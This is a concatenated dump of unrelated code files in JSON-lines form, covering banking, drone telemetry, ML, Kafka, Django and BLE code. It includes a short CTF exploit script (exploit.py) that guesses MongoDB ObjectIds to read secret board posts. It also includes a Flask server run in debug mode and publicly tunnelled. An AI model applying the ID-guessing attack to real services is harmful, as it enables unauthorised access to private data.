already saved in your contacts.\r\n Along with the error message it will print \r\n the name of the duplicate.\r\n \"\"\"\r\n data = await self.http.add_contact(name, account)\r\n return data\r\n\r\n async def delete_contact(self, account=None):\r\n \"\"\"|coro|\r\n\r\n Method to delete a contact.\r\n\r\n Returns\r\n ---------\r\n str: notice\r\n 'Contact removed successfully'\r\n\r\n Raises\r\n --------\r\n MissingRequiredFields\r\n Missing the contact details (account number or name or id).\r\n InvalidContent\r\n Contact is not found in your list of contacts.\r\n ClientError\r\n Bad request while deleting contact.\r\n HTTPException\r\n Failed to login.\r\n \"\"\"\r\n data = await self.http.delete_contact(account)\r\n return data\r\n\r\n async def get_history(self) -> dict:\r\n \"\"\"|coro|\r\n\r\n Method which retrieves the account history.\r\n\r\n Returns\r\n ---------\r\n dict: transactions\r\n Dictionary object containing transactions relating to each account.\r\n {account1:{[{transaction1},{transaction2}]},account2:{[{transaction1},{transaction2}]},}\r\n\r\n transaction:\r\n {'date': 'date', 'sender': 'sender', 'amount': 'amount', 'minus': True/False, 'balance': 'uncleared amount', \r\n 'description': 'Type of transaction'}\r\n\r\n Raises\r\n --------\r\n HTTPException\r\n Bad request while fetching transactions.\r\n \"\"\"\r\n data = await self.http.get_history()\r\n return data\r\n\r\n async def start(self):\r\n \"\"\"|coro|\r\n An asynchronous call which starts the BML event loop.\r\n listen for new transactions using a decorator like:\r\n @aiobmlclient.event('new_transaction')\r\n async def data_handler(data):\r\n print(data)\r\n\r\n Note\r\n --------\r\n Will fire all the transactions within last 24hrs at the app reboot.\r\n Use a db to make sure that you arnt notified of the same transaction.\r\n \"\"\"\r\n while True:\r\n mybank = await self.http.get_history()\r\n if mybank:\r\n for accounts in mybank:\r\n for transaction in mybank[accounts]:\r\n transaction.pop('balance')\r\n if (transaction not in self.transactions):\r\n self.emit('new_transaction', transaction)\r\n self.transactions.append(transaction)\r\n await asyncio.sleep(30)\r\n","sub_path":"aiobml/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"578153490","text":"from flask import Flask, render_template\nfrom pymavlink import mavutil\nfrom msgdef import *\nimport socket\nimport os\nimport threading\n\nHOST = '127.0.0.1' #Server IP address\nPORT = 65432 #Server port\nfirstTime = True #Indicates whether its the first time to call my_server()\ndata_view = \"\"\"\"\"\" #Store data to view on webpage\nbufferSize = 512\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/init')\ndef init():\n server()\n\n@app.route('/data')\ndef data():\n return f\"\"\"\"\"\"+ data_view +''\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\ndef server():\n global data_view\n global firstTime\n\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a UDP socket\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #Allow socket to reuse port\n s.bind((HOST, PORT)) #Bind socket to port\n\n sensorConnection = mavutil.mavlink_connection('udpin:localhost:14540') #Create a MAVLink connection to receive sensor data\n\n if firstTime:\n # Indicating the server has started\n print(\"Server Started waiting for clients to connect \")\n firstTime = False\n receiveDataAndSendActuatorSignal(sensorConnection, s) \n\ndef receiveDataAndSendActuatorSignal(mavlink, socket):\n global data_view\n\n with socket:\n while True:\n try:\n data, addr = socket.recvfrom(bufferSize) #Receive UDP client port\n except:\n data = b''\n if len(data) != 0: #Checks if UDP client is connected\n imu_msg = mavlink.recv_match(type='HIGHRES_IMU', blocking=True, timeout = 0.001) #Receive sensor data through MAVLink\n if imu_msg == None:\n continue #Restart loop if no data is received \n print(imu_msg)\n\n actuatorSignal = imu_msg.xacc * 1.5 #Generate some actuator signal\n encodedData = str(actuatorSignal).encode('utf-8') # Encoding the signal\n socket.sendto(encodedData, addr) # Send the byte stream to client\n\n data_view = f'''

Actuator Signal: {actuatorSignal}
X Acceleration: {imu_msg.xacc}
\n Y Acceleration: {imu_msg.yacc}
Z Acceleration: {imu_msg.zacc}
\n X Gyro: {imu_msg.xgyro}
Y Gyro: {imu_msg.ygyro}
\n Z Gyro: {imu_msg.zgyro}

''' + data_view\n\ndef url():\n os.system('cmd /k \"lt --port 5000\"')\n\nif __name__ == '__main__':\n threading.Thread(target=url).start() #Start local tunnel\n app.run(debug=True, host='0.0.0.0') #Build the Flask app","sub_path":"UDP MAVLink Server/serverPi.py","file_name":"serverPi.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"286720917","text":"\"\"\"\nRank related code\n\"\"\"\n\nfrom scipy.stats import rankdata\n\n\ndef rank_artists(data, ranks, age_range=None, distances=None):\n \"\"\"\n Ranks artists based on different criteria.\n @param distances: distances to film set calculated for all artists\n @param age_range: tuple with age range artists has been filtered by\n @param ranks: string containing requested ranks\n @param data: Artists data\n \"\"\"\n all_ranks = []\n try:\n for rank in ranks.split(','):\n rank_key, unused_, weight = rank.partition(':')\n if rank_key == 'age':\n if age_range:\n middle_age_range = age_range[0] + ((age_range[1] - age_range[0]) / 2.0)\n else:\n ages = [a['age'] for a in data['artists']]\n min_age = min(ages)\n max_age = max(ages)\n middle_age_range = min_age + (max_age - min_age) / 2.0\n r = rankdata([abs(middle_age_range - a[rank_key]) for a in data['artists']])\n elif rank_key == 'distance':\n r = rankdata([distances[a['uuid']] for a in data['artists']])\n else:\n r = rankdata([a[rank_key] for a in data['artists']])\n if weight:\n try:\n weight = float(weight)\n except ValueError:\n raise TypeError('Wrong rank requested!')\n r = [e * weight for e in r]\n all_ranks.append(r)\n except KeyError:\n raise TypeError('Wrong rank requested!')\n else:\n ranks = {r[0]: sum(r[1:]) for r in zip((a['uuid'] for a in data['artists']), *all_ranks)}\n data['artists'].sort(key=lambda x: ranks[x['uuid']])\n","sub_path":"the_artist/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"28492708","text":"#!/bin/python\n\n# This is a program to calculate a buy range for a proper buy point.\n# It adds 5% to the proper buy point.\n\n\ndef stkData():\n ni = i.upper()\n b = input('Buy point? ')\n t = float(b) * 1.05\n t = round(t, 2)\n print(str(i) + ' -- ' + str(b) + ' -- ' + str(t))\n txt = str(ni) + ' -- ' + str(b) + ' -- ' + str(t)\n f.write(str(txt))\n f.write(\"\\n\")\n f.write(\"\\n\")\n\n\nf = open(\"/home/sot/Desktop/buyRange.txt\", \"a\")\nwhile True:\n i = input('Symbol? ')\n if i == '':\n f.close()\n break\n stkData()\n","sub_path":".local/bin/buyRange.py","file_name":"buyRange.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90380195","text":"import requests, string, itertools\n\n# mongodb object id rule\n# 4byte(timestamp) + 5byte(machine based random) + 3byte(index count)\n# guess available for timestamp, indexcount\n\n# api/board/:query_no doesn't check if it's secret(READ CODE!!)\npost_1 = '64 11 5d 59 c30c6c4f03 502e1c'\npost_2 = '64 11 5d 5e c30c6c4f03 502e1d'\npost_4 = '64 11 5d 61 c30c6c4f03 502e1f'\n\nalpha_nums = list(string.ascii_lowercase + string.digits)\nperms = itertools.permutations(alpha_nums, 2)\n\n# for i in perms:\nfor i in ['5f', '60']:\n query_no = f'64115d{i}c30c6c4f03502e1e'\n res = requests.get(f'http://host3.dreamhack.games:12830/api/board/{query_no}')\n print(f'{query_no} : {res.status_code}')\n print(res.content)","sub_path":"web_hacking/problems/lv1-mongoboard/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342115225","text":"# Use the probability(hand, deck) function in this file \r\n# to calculate the probability of getting a certain hand \r\n# given a randomly shuffled deck.\r\n\r\n# The main() function in this file\r\n# computes the probability of getting all possible hands\r\n# given a randomly shuffled deck containing 7 copper and 3 estate.\r\n\r\n# Michael Chu\r\n# 5/22/20\r\n\r\nimport math\r\n\r\nHANDSIZE = 5\r\n\r\n# Returns the number of spots left in the hand we're trying to build (given a certain base b)\r\ndef spotsLeft(b):\r\n spots = HANDSIZE\r\n for n in b.values():\r\n spots = spots - n\r\n return spots\r\n\r\n# Calculates n choose r\r\ndef nCr(n,r):\r\n f = math.factorial\r\n return f(n)/(f(r)*f(n-r))\r\n\r\n# Calculates the number of cards in deck d\r\ndef nCards(d):\r\n count = 0\r\n for n in d.values():\r\n count += n\r\n return count\r\n\r\n# Returns all possible hands of 5 cards given a certain base and a certain deck\r\ndef hands(deck,base={}):\r\n # Makes copies so as to not disturb the originals\r\n d = deck.copy()\r\n b = base.copy()\r\n\r\n # If the deck is empty, return base (as long at it is a valid hand)\r\n if len(d)==0:\r\n spots = spotsLeft(b)\r\n if spots > 0:\r\n return []\r\n elif spots == 0:\r\n return [b]\r\n else:\r\n return [\"INVALID HAND\"]\r\n\r\n # Otherwise... Pick a card type from the deck \r\n cardType = list(d)[0]\r\n amount = d[cardType]\r\n \r\n # Update the deck\r\n del d[cardType]\r\n\r\n # Figure out how many spots in the hand are left\r\n spots = spotsLeft(b)\r\n\r\n # Generate hands with i of the card type\r\n handList = []\r\n for i in range(0,min(spots,amount)+1):\r\n b[cardType] = i\r\n handList += hands(d,b)\r\n\r\n return handList\r\n\r\n# Calculates probability of getting a certain hand given a randomly shuffled deck\r\ndef probability(hand,deck):\r\n successes = 1\r\n for card,amount in hand.items(): \r\n successes = successes*nCr(deck[card],amount)\r\n possible = nCr(nCards(deck),5)\r\n\r\n prob = successes/possible\r\n return prob\r\n\r\ndef main():\r\n deck = {\"copper\":7,\r\n \"estate\":3}\r\n print(\"Deck: \",deck)\r\n print()\r\n\r\n possibleHands = hands(deck)\r\n print(\"Possible Hands:\")\r\n print(possibleHands)\r\n print()\r\n\r\n print(\"Probabilities:\")\r\n probabilities = {}\r\n for hand in possibleHands:\r\n prob = probability(hand,deck)\r\n print(hand,prob)\r\n probabilities[tuple(hand.items())] = prob\r\n print()\r\n print(probabilities)\r\n print()\r\n\r\n sum = 0\r\n for prob in probabilities.values():\r\n sum += prob\r\n print(\"Sum of Probabilities: \",sum)\r\n\r\nmain()\r\n","sub_path":"probabilities.py","file_name":"probabilities.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"278435494","text":"from flask import current_app as app\n\n@app.route('/HOOK',methods = ['POST','GET'])\ndef webhook():\n\tif request.method == \"POST\":\n\t\tupdate = telegram.Update.de_json(request.get_json(force=True),bot)\n\t\tdispatcher.process_update(update)\n\t\tupdate_queue.put(update)\n\t\treturn \"OK\"\n\telse:\n\t\treturn \"You are browser!\"\n\n\n\n#Set_webhook\n@app.route('/set_webhook', methods = ['GET', 'POST'])\ndef set_webhook():\n\ts = bot.setWebhook('https://%s:443/HOOK' % URL, certificate = open('/etc/ssl/admin/server.crt','rb'))\n\tif s:\n\t\tprint(s)\n\t\treturn \"webhook setup ok\"\n\telse:\n\t\treturn \"webhook setup failed\"\n \n \n","sub_path":"bot/application-bot/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61598553","text":"from random import randint\nfrom time import sleep\nfrom operator import itemgetter\njogo = {'jogador1': randint(1, 6),\n 'jogador2': randint(1, 6),\n 'jogador3': randint(1, 6),\n 'jogador4': randint(1, 6)}\nprint('- ' * 20)\nranking = []\nsleep(1)\nfor k, v in jogo.items():\n print(f'{k} jogou {v} no dado.')\n sleep(1)\nprint('- ' * 20)\nranking = sorted(jogo.items(), key=itemgetter(1), reverse=True)\nfor i, d in enumerate(ranking):\n print(f'{i + 1}º lugar: {d[0]} com {d[1]}')\n","sub_path":"Desafios/des091a.py","file_name":"des091a.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264498547","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import BookingForm\nfrom django.contrib import messages\nfrom .models import Booking\nfrom django.core.urlresolvers import reverse\n\ndef booking_create(request):\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"successfully created\")\n return reverse(request, 'booking/detail.html', instance.get_absolute_url())\n else:\n messages.error(request, \"Not Successfully Created\")\n context = {\n \"form\": form,\n }\n return render(request, 'booking/form.html', context)\n\ndef booking_detail(request):\n instance = get_object_or_404(booking_create)\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n }\n return render(request, 'booking/detail.html', context)\n\ndef booking_list(request):\n queryset = Booking.objects.all()\n context = {\n \"object_list\": queryset,\n \"title\": \"List\"\n }\n return render(request, 'booking/list.html', context)\n\ndef booking_edit(request):\n instance = get_object_or_404(Booking, id=id)\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, \"
Item Saved\", extra_tags='html_safe')\n return redirect(instance.get_absolute_url())\n\n context = {\n \"id\": instance.id,\n \"instance\": instance,\n \"form\": form,\n }\n return render(request, \"\", context)\n\ndef booking_delete(request):\n instance = get_object_or_404(Booking)\n instance.delete()\n messages.success(request, \"Successfully deleted\")\n return redirect(\"booking:list\")","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"124135042","text":"# from openvino.inference_engine import IENetwork, IEPlugin\nimport numpy as np\nimport cv2\nimport time\nimport sys\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport os\nimport glob\nfrom tqdm import tqdm\n# 실시간 추적 모듈 sort 사용\nfrom sort import *\n\ncam_w = 320\ncam_h = 240\nimage_size = 416\n\n# cam에 맞는 size로 맞추기 위한 w,h\nnew_w = int(cam_w * min(image_size/cam_w, image_size/cam_h))\nnew_h = int(cam_h * min(image_size/cam_w, image_size/cam_h))\n\nxml_path = '/home/pi/workspace/IR/tiny-yolov3.xml'\nbin_path = '/home/pi/workspace/IR/tiny-yolov3.bin'\n\nLABELS = (\"person\", \"bicycle\", \"car\", \"motorbike\", \"aeroplane\",\n \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\",\n \"fire hydrant\", \"stop sign\", \"parking meter\", \"bench\", \"bird\",\n \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\",\n \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\",\n \"umbrella\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\",\n \"skis\", \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\",\n \"baseball glove\", \"skateboard\", \"surfboard\",\"tennis racket\", \"bottle\",\n \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\",\n \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\",\n \"broccoli\", \"carrot\", \"hot dog\", \"pizza\", \"donut\",\n \"cake\", \"chair\", \"sofa\", \"pottedplant\", \"bed\",\n \"diningtable\", \"toilet\", \"tvmonitor\", \"laptop\", \"mouse\",\n \"remote\", \"keyboard\", \"cell phone\", \"microwave\", \"oven\",\n \"toaster\", \"sink\", \"refrigerator\", \"book\", \"clock\",\n \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\")\n\n# network 생성\n# net = IENetwork(model = xml_path,weights = bin_path)\n\n# device (MYRIAD : NCS2)\n# plugin = IEPlugin(device='MYRIAD')\n# exec_net = plugin.load(net)\n\n# cam on/cam setting\ncam = cv2.VideoCapture(0)\ncam.set(cv2.CAP_PROP_FPS, 30)\ncam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_w)\ncam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_h)\n\nwhile(True) :\n # frame preprossing\n ret, frame = cam.read()\n resized_image = cv2.resize(frame, (image_size, image_size), interpolation=cv2.INTER_CUBIC)\n\n # 128로 채운다\n canvas = np.full((image_size, image_size, 3), 128)\n canvas[(image_size - new_h) // 2:(image_size - new_h) // 2 + new_h, (image_size - new_w) // 2:(image_size - new_w) // 2 + new_w, :] = resized_image\n\n prepimg = canvas\n\n prepimg = resized_image[np.newaxis, :, :, :] # Batch size axis add\n prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW\n\n start = time.time()\n\n cv2.imshow('image', prepimg)\n # inference\n # res = exec_net.infer({'inputs': prepimg})\n\n end = time.time()\n\n print('inference time : ', end - start)\n\n\n\n k = cv2.waitKey(10) & 0xFF\n if k == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"openvino.py","file_name":"openvino.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"329179178","text":"# -*- coding: utf-8 -*-\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport time\nimport random\n\nfrom sqlalchemy import event, exc, select\n\nfrom airflow.utils.log.logging_mixin import LoggingMixin\n\nlog = LoggingMixin().log\n\n\ndef setup_event_handlers(\n engine,\n reconnect_timeout_seconds,\n initial_backoff_seconds=0.2,\n max_backoff_seconds=120):\n\n @event.listens_for(engine, \"engine_connect\")\n def ping_connection(connection, branch):\n \"\"\"\n Pessimistic SQLAlchemy disconnect handling. Ensures that each\n connection returned from the pool is properly connected to the database.\n\n http://docs.sqlalchemy.org/en/rel_1_1/core/pooling.html#disconnect-handling-pessimistic\n \"\"\"\n if branch:\n # \"branch\" refers to a sub-connection of a connection,\n # we don't want to bother pinging on these.\n return\n\n start = time.time()\n backoff = initial_backoff_seconds\n\n # turn off \"close with result\". This flag is only used with\n # \"connectionless\" execution, otherwise will be False in any case\n save_should_close_with_result = connection.should_close_with_result\n\n while True:\n connection.should_close_with_result = False\n\n try:\n connection.scalar(select([1]))\n # If we made it here then the connection appears to be healty\n break\n except exc.DBAPIError as err:\n if time.time() - start >= reconnect_timeout_seconds:\n log.error(\n \"Failed to re-establish DB connection within %s secs: %s\",\n reconnect_timeout_seconds,\n err)\n raise\n if err.connection_invalidated:\n log.warning(\"DB connection invalidated. Reconnecting...\")\n\n # Use a truncated binary exponential backoff. Also includes\n # a jitter to prevent the thundering herd problem of\n # simultaneous client reconnects\n backoff += backoff * random.random()\n time.sleep(min(backoff, max_backoff_seconds))\n\n # run the same SELECT again - the connection will re-validate\n # itself and establish a new connection. The disconnect detection\n # here also causes the whole connection pool to be invalidated\n # so that all stale connections are discarded.\n continue\n else:\n log.error(\n \"Unknown database connection error. Not retrying: %s\",\n err)\n raise\n finally:\n # restore \"close with result\"\n connection.should_close_with_result = save_should_close_with_result\n\n\n @event.listens_for(engine, \"connect\")\n def connect(dbapi_connection, connection_record):\n connection_record.info['pid'] = os.getpid()\n\n\n @event.listens_for(engine, \"checkout\")\n def checkout(dbapi_connection, connection_record, connection_proxy):\n pid = os.getpid()\n if connection_record.info['pid'] != pid:\n connection_record.connection = connection_proxy.connection = None\n raise exc.DisconnectionError(\n \"Connection record belongs to pid {}, \"\n \"attempting to check out in pid {}\".format(connection_record.info['pid'], pid)\n )\n","sub_path":"airflow/utils/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"588685759","text":"import json\nimport os\nimport wget\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 3\"\n\n# Load sarcasm dataset\ndata_dir = 'sarcasm'\nfilename = os.path.join(data_dir, 'sarcasm.json')\nif not os.path.exists(data_dir):\n # Download dataset\n os.mkdir(data_dir)\n url = 'https://storage.googleapis.com/laurencemoroney-blog.appspot.com/sarcasm.json'\n filename = wget.download(url, out=data_dir)\n\nwith open(filename, 'r') as f:\n datastore = json.load(f)\n\nvocab_size = 10000\nembedding_dim = 16\nmax_length = 100\ntrunc_type = 'post'\npadding_type = 'post'\noov_tok = \"\"\ntraining_size = 20000\n\nsentences = []\nlabels = []\n\nfor item in datastore:\n sentences.append(item['headline'])\n labels.append(item['is_sarcastic'])\n\ntraining_sentences = sentences[0:training_size]\ntesting_sentences = sentences[training_size:]\ntraining_labels = labels[0:training_size]\ntesting_labels = labels[training_size:]\n\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\ntokenizer.fit_on_texts(training_sentences)\n\nword_index = tokenizer.word_index\n\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\ntraining_padded = pad_sequences(training_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\ntesting_padded = pad_sequences(testing_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\n# Need this block to get it to work with TensorFlow 2.x\n\ntraining_padded = np.array(training_padded)\ntraining_labels = np.array(training_labels)\ntesting_padded = np.array(testing_padded)\ntesting_labels = np.array(testing_labels)\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, input_length=max_length),\n tf.keras.layers.GlobalAveragePooling1D(),\n tf.keras.layers.Dense(24, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\n\nnum_epochs = 30\nhistory = model.fit(training_padded, training_labels, epochs=num_epochs,\n validation_data=(testing_padded, testing_labels), verbose=2)\n\n\ndef plot_graphs(history, string):\n plt.plot(history.history[string])\n plt.plot(history.history['val_' + string])\n plt.xlabel(\"Epochs\")\n plt.ylabel(string)\n plt.legend([string, 'val_' + string])\n plt.show()\n\n\nplot_graphs(history, \"accuracy\")\nplot_graphs(history, \"loss\")\n\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n\ndef decode_sentence(text):\n return ' '.join([reverse_word_index.get(i, '?') for i in text])\n\n\nprint(decode_sentence(training_padded[0]))\nprint(training_sentences[2])\nprint(labels[2])\n\ne = model.layers[0]\nweights = e.get_weights()[0]\nprint(weights.shape) # shape: (vocab_size, embedding_dim)\n\nsentence = [\"granny starting to fear spiders in the garden might be real\",\n \"game of thrones season finale showing this sunday night\"]\nsequences = tokenizer.texts_to_sequences(sentence)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\nprint(model.predict(padded))\n\n# End of file tag\nprint('eof')\n","sub_path":"_35_SarcasmClassifier.py","file_name":"_35_SarcasmClassifier.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61060928","text":"import os\r\nimport logging\r\nimport datetime\r\nimport time\r\nimport pymysql\r\nimport configparser\r\nfrom confluent_kafka import KafkaError,Consumer,KafkaException\r\nfrom bson import json_util, ObjectId\r\nfrom bson.json_util import dumps,loads,JSONOptions,DEFAULT_JSON_OPTIONS\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n\"\"\" 创建一个从KAFKA数据库拉取数据的类\"\"\"\r\n\"\"\"從未加認證的主機接數據\"\"\"\r\nclass Fetch(object) :\r\n\t\"\"\"重写类的初始化属性\"\"\"\r\n\tdef __init__(self) :\r\n\t\tself.config = configparser.RawConfigParser()\r\n\t\tself.config.read('./config.cfg')\r\n\t\tif not os.path.exists('./Log'):\r\n\t\t\tos.makedirs('./Log')\r\n\t\tlogging.basicConfig(filename='./Log/'+datetime.datetime.today().strftime(\"%Y%m%d\")+'.log'\r\n\t\t\t, level=logging.INFO\r\n\t\t\t, format='%(asctime)s %(message)s'\r\n\t\t\t, datefmt='%Y/%m/%d %I:%M:%S %p')\r\n\t\t\r\n\t\t\"\"\"建立与kafka数据库连接的客户端,group.id随意命名,保证其他人没有在使用这个id,因为一个id只能拉取一次数据,每次拉取数据都拉取七天前到现在的数据\"\"\"\r\n\t\ttry :\r\n\t\t\tSource_Kafka_Consumer = Consumer({\r\n\t\t\t\t\t'bootstrap.servers':'xx.xx.xx.xx:xx'\r\n\t\t\t\t\t,'group.id':'careyfetch'\r\n\t\t\t\t\t,'auto.offset.reset':'earliest'\r\n\t\t\t\t\t, 'session.timeout.ms': 6000\r\n\t\t\t\t\t})\r\n\t\t\tDEFAULT_JSON_OPTIONS.strict_uuid = True\r\n\t\t\tSource_Kafka_Consumer.subscribe(['xxx.xxx.xxx'])\t\t#指定要拉取哪个topic的数据\r\n\t\t\tself.consumer = Source_Kafka_Consumer\r\n\t\texcept Exception as inst:\r\n\t\t\tprint('kafaka Connection Fail')\r\n\t\t\tprint(inst)\r\n\t\t\tlogging.error('kafaka Connection Fail')\r\n\t\t\tlogging.error(inst)\r\n\t\r\n\t\"\"\"这是一个从kafka数据库拉取数据的函数范例\"\"\"\r\n\tdef fetch_xxxx(self):\r\n\t\ttry:\r\n\t\t\tonelist = []\r\n\t\t\tcount = 0\r\n\t\t\twhile True:\r\n\t\t\t\t\"\"\"通过创建好连接kafka客服端和相关参数,拉取数据\"\"\"\r\n\t\t\t\tmsg = self.consumer.poll(1)\r\n\t\t\t\tif msg is None:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif msg.error():\r\n\t\t\t\t\tprint('Consumer error: {}'.format(msg.error()))\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\"\"\"取出数据,和存储数据\"\"\"\r\n\t\t\t\tdata = json_util.loads(msg.value())\r\n\t\t\t\tonelist.append(data)\r\n\t\t\t\tcount = count + 1\r\n\t\t\t\tif count == 1000 :\r\n\t\t\t\t\tbreak\r\n\t\t\tself.consumer.close()\r\n\t\texcept Exception as inst:\r\n\t\t\t\tprint('kafaka fetch meterbase Fail')\r\n\t\t\t\tprint(inst)\r\n\t\t\t\tlogging.error('happen kafaka fecth meterbase Fail')\r\n\t\t\t\tlogging.error(inst)\r\n\t\treturn onelist\r\n","sub_path":"fetchkafka.py","file_name":"fetchkafka.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"46799818","text":"#!/usr/bin/env python3\n\n\nimport numpy as np\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Evaluator(object):\n\n def __init__(self, trainer, discount_factor):\n self._trainer = trainer\n self._discount_factor = discount_factor\n self.mc_loss = []\n self.td_loss = []\n\n def report(self, episode_values, predictions, td_loss):\n mc_loss = float(np.mean(np.abs(episode_values - predictions)))\n td_loss_mean = float(np.mean(td_loss))\n self.mc_loss.append(mc_loss)\n self.td_loss.append(td_loss_mean)\n logger.info(\"MC LOSS: {0:.3f} TD LOSS: {1:.3f}\".format(mc_loss, td_loss_mean))\n\n def get_recent_td_loss(self):\n begin = max(0, len(self.td_loss) - 100)\n return np.mean(np.array(self.td_loss[begin:]))\n\n def get_recent_mc_loss(self):\n begin = max(0, len(self.mc_loss) - 100)\n return np.mean(np.array(self.mc_loss[begin:]))\n","sub_path":"ml/rl/training/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356004436","text":"import asyncio\nfrom sys import platform\nimport logging\nfrom bleak import BleakClient, BleakScanner\n\nUUIDS = {\n \"target_temp\": \"fc540003-236c-4c94-8fa9-944a3e5353fa\",\n \"led_color\": \"fc540014-236c-4c94-8fa9-944a3e5353fa\",\n \"current_temp\": \"fc540002-236c-4c94-8fa9-944a3e5353fa\",\n \"current_bat\": \"fc540007-236c-4c94-8fa9-944a3e5353fa\",\n}\n\nlogging.basicConfig(format=\"%(asctime)s %(message)s \", level=logging.INFO)\n\n\nclass Mug:\n def __init__(self, unit: str, coffeeTemp=5500, teaTemp=5900):\n self.unit = unit\n self.coffeeTemp = coffeeTemp\n self.teaTemp = teaTemp\n self.keepConnectionAlive = True\n self.searchForDevice = True\n self.current_temp = None\n\n async def connectToMug(self):\n try:\n print(\"Searching..\", end=\"\")\n # self.connectionChanged.emit(False)\n # Search for the mug as long til we find it.\n while self.searchForDevice:\n print(\".\", end=\"\")\n scanner = BleakScanner()\n # scanner.register_detection_callback(detection_callback)\n await scanner.start()\n await asyncio.sleep(5.0)\n await scanner.stop()\n devices = await scanner.get_discovered_devices()\n for device in devices:\n if device.name == \"Ember Ceramic Mug\":\n # We found the ember mug!\n print(device.address)\n print(device.name)\n print(device.details)\n # try to connect to the mug\n async with BleakClient(device) as client:\n self.connectedClient = client\n self.isConnected = await client.is_connected()\n print(\"Connected: 